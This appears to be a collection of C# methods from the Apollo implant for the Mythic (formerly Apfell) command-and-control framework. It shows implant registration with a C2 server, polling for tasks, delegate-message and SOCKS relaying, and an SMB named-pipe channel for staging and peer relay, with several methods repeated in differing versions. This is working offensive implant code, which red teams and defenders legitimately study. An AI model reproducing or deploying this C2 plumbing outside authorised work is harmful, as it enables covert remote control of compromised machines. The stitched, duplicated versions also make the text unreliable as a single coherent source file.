/// <summary> /// Register the agent with the Apfell server. /// </summary> /// <param name="agent">The agent to register with the server.</param> /// <returns>UUID of the newly registered agent.</returns> override public string RegisterAgent(Apollo.Agent agent) { // Get JSON string for implant DebugWriteLine("Attempting to serialize agent..."); string json = JsonConvert.SerializeObject(agent); DebugWriteLine($"[+] InitializeImplant - Sending {json}"); string id = Guid.NewGuid().ToString(); if (Send(id, json)) { DebugWriteLine("Successfuly sent registration message!"); string result = (string)Inbox.GetMessage(id); if (result.Contains("success")) { // If it was successful, initialize implant // Response is { "status": "success", "id": <id> } JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result); string newUUID = resultJSON.Value <string>("id"); cryptor.UpdateUUID(newUUID); return(newUUID); } else { throw (new Exception("Failed to retrieve an ID for new callback.")); } } return(""); }
public override string RegisterAgent(Apollo.Agent agent) { // Get JSON string for implant string json = JsonConvert.SerializeObject(agent); string result; string id = Guid.NewGuid().ToString(); //string result = Send(json); DebugWriteLine($"Sending registration message with ID {id}..."); if (Send(id, json)) { DebugWriteLine($"SUCCESS! Sent registration message with ID {id}"); DebugWriteLine($"Waiting for reply to registration message with ID {id}..."); result = (string)Inbox.GetMessage(id); DebugWriteLine($"SUCCESS! Got reply to registration message with ID {id}..."); if (result.Contains("success")) { // If it was successful, initialize implant // Response is { "status": "success", "id": <id> } JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result); string newUUID = resultJSON.Value <string>("id"); cryptor.UpdateUUID(newUUID); return(newUUID); } } else { throw (new Exception("Failed to retrieve an ID for new callback.")); } return(""); }
public override Structs.TaskQueue GetMessages(Apollo.Agent agent) { Structs.TaskQueue result; List <Task> finalTaskList = new List <Task>(); List <Structs.DelegateMessage> finalDelegateList = new List <Structs.DelegateMessage>(); Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject <Structs.CheckTaskingResponse>(GetTaskingMessage()); foreach (Task task in resp.tasks) { Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id); finalTaskList.Add(task); } if (resp.delegates != null) { foreach (Dictionary <string, string> delegateMessage in resp.delegates) { foreach (KeyValuePair <string, string> item in delegateMessage) { finalDelegateList.Add(new Structs.DelegateMessage() { UUID = item.Key, Message = item.Value }); } } } result = new Structs.TaskQueue() { Tasks = finalTaskList.ToArray(), Delegates = finalDelegateList.ToArray() }; //result.Add("tasks", finalTaskList.ToArray()); //result.Add("delegates", finalDelegateList.ToArray()); //SCTask task = JsonConvert.DeserializeObject<SCTask>(Post(json)); return(result); }
public override Structs.TaskQueue GetMessages(Apollo.Agent agent) { Structs.TaskQueue result; List <Task> finalTaskList = new List <Task>(); List <Structs.DelegateMessage> finalDelegateList = new List <Structs.DelegateMessage>(); Structs.CheckTaskingRequest req = new Structs.CheckTaskingRequest() { action = "get_tasking", tasking_size = 1 }; if (DelegateMessageRequestQueue.Count > 0) { DelegateMessageRequestMutex.WaitOne(); req.delegates = DelegateMessageRequestQueue.ToArray(); DelegateMessageRequestQueue.Clear(); //DelegateMessageQueue = new List<Dictionary<string, string>>(); DelegateMessageRequestMutex.ReleaseMutex(); } // Could add delegate post messages string json = JsonConvert.SerializeObject(req); string taskingId = Guid.NewGuid().ToString(); if (Send(taskingId, json)) { string response = (string)Inbox.GetMessage(taskingId); Mythic.Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject <Mythic.Structs.CheckTaskingResponse>(response); foreach (Task task in resp.tasks) { Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id); finalTaskList.Add(task); } if (resp.delegates != null) { foreach (Dictionary <string, string> delegateMessage in resp.delegates) { foreach (KeyValuePair <string, string> item in delegateMessage) { finalDelegateList.Add(new Structs.DelegateMessage() { UUID = item.Key, Message = item.Value }); } } } } result = new Structs.TaskQueue() { Tasks = finalTaskList.ToArray(), Delegates = finalDelegateList.ToArray() }; //result.Add("tasks", finalTaskList.ToArray()); //result.Add("delegates", finalDelegateList.ToArray()); //SCTask task = JsonConvert.DeserializeObject<SCTask>(Post(json)); return(result); }
public abstract Structs.TaskQueue GetMessages(Apollo.Agent agent);
//public abstract string PostResponse(Structs.DownloadFileRegistrationMessage taskresp); public abstract string RegisterAgent(Apollo.Agent agent);
/// <summary> /// Check Apfell endpoint for new task /// </summary> /// <returns>CaramelTask with the next task to execute</returns> override public Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent) { Stopwatch sw = new Stopwatch(); sw.Start(); //DebugWriteLine("Attempting to send SOCKS datagrams..."); //SendSocksDatagrams(); sw.Stop(); DebugWriteLine($"SendSocksDatagrams took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run."); sw.Restart(); //DebugWriteLine("Sent all SOCKS datagrams!"); TaskQueue response = new TaskQueue(); List <Task> finalTaskList = new List <Task>(); List <DelegateMessage> finalDelegateMessageList = new List <DelegateMessage>(); CheckTaskingRequest req = new CheckTaskingRequest() { action = "get_tasking", tasking_size = -1 }; if (DelegateMessageRequestQueue.Count > 0) { DelegateMessageRequestMutex.WaitOne(); req.delegates = DelegateMessageRequestQueue.ToArray(); DelegateMessageRequestQueue.Clear(); DelegateMessageRequestMutex.ReleaseMutex(); } else { req.delegates = new Dictionary <string, string>[] { }; } // Could add delegate post messages string json = JsonConvert.SerializeObject(req); string id = Guid.NewGuid().ToString(); if (Send(id, json)) { string returnMsg = (string)Inbox.GetMessage(id); //JObject test = (JObject)JsonConvert.DeserializeObject(returnMsg); ////Dictionary<string, object>[] testDictTasks = test.Value<Dictionary<string, object>[]>("tasks"); //Task[] testTasks = test.Value<Task[]>("tasks"); Mythic.Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject <Mythic.Structs.CheckTaskingResponse>(returnMsg); if (resp.tasks != null) { foreach (Task task in resp.tasks) { Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id); finalTaskList.Add(task); } } if (resp.delegates != null) { foreach (Dictionary <string, string> delmsg in resp.delegates) { string uuid = delmsg.Keys.First(); finalDelegateMessageList.Add(new DelegateMessage() { UUID = uuid, Message = delmsg[uuid] }); } } if (resp.socks != null) { response.SocksDatagrams = resp.socks; } } response.Delegates = finalDelegateMessageList.ToArray(); response.Tasks = finalTaskList.ToArray(); sw.Stop(); DebugWriteLine($"Get tasking took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run."); //SCTask task = JsonConvert.DeserializeObject<SCTask>(Post(json)); return(response); }
public override Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent) { throw new NotImplementedException(); }
public override string RegisterAgent(Apollo.Agent agent) { // Get JSON string for implant string json = JsonConvert.SerializeObject(agent); byte[] reqPayload = Encoding.UTF8.GetBytes(base.cryptor.Encrypt(json)); if (holdConnection) { serverStream.Close(); serverStream = CreateNamedPipeServer(); holdConnection = false; } serverStream.WaitForConnection(); holdConnection = true; Thread t = new Thread(() => ReadAndSortMessages()); t.Start(); SMBMessage uuidRegistration = new SMBMessage() { MessageType = "uuid_registration", MessageObject = base.cryptor.GetUUIDBytes() }; // This is the payload uuid, so we need to stage and get the new one if (base.cryptor.GetUUIDString() == baseUUID) { //uuidRegistration.MessageType = "staging_uuid_registration"; uuidRegistration.MessageObject = Encoding.UTF8.GetBytes("staging-" + base.cryptor.GetUUIDString()); SMBMessage registerMsg = new SMBMessage() { MessageType = "register", MessageObject = reqPayload }; // Get JSON string for implant //string result = Send(registrationId, registerMsg); string result; DebugWriteLine($"Sending uuid_registration message to client..."); Send(uuidRegistration); DebugWriteLine($"SUCCESS! Sent uuid_registration message!"); DebugWriteLine($"Sending Apfell registration message to client..."); if (Send(registerMsg)) { DebugWriteLine($"SUCCESS! Sent Apfell registration message!"); DebugWriteLine($"Waiting for initial checkin response from Apfell server..."); result = (string)Inbox.GetMessage("checkin"); DebugWriteLine($"SUCCESS! Got initial checkin response from Apfell server!\n\t{result}"); if (result.Contains("success")) { // If it was successful, initialize implant // Response is { "status": "success", "id": <id> } JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result); string newUUID = resultJSON.Value <string>("id"); base.cryptor.UpdateUUID(newUUID); SMBMessage notifyRelayMessage = new SMBMessage() { MessageType = "uuid_registration", MessageObject = Encoding.UTF8.GetBytes(newUUID) }; // Do something with bool? Send(notifyRelayMessage); return(newUUID); } else { throw (new Exception("Failed to retrieve an ID for new callback.")); } } return(""); } else { // we've already got an agent uuid, return that. Send(uuidRegistration); return(base.cryptor.GetUUIDString()); } }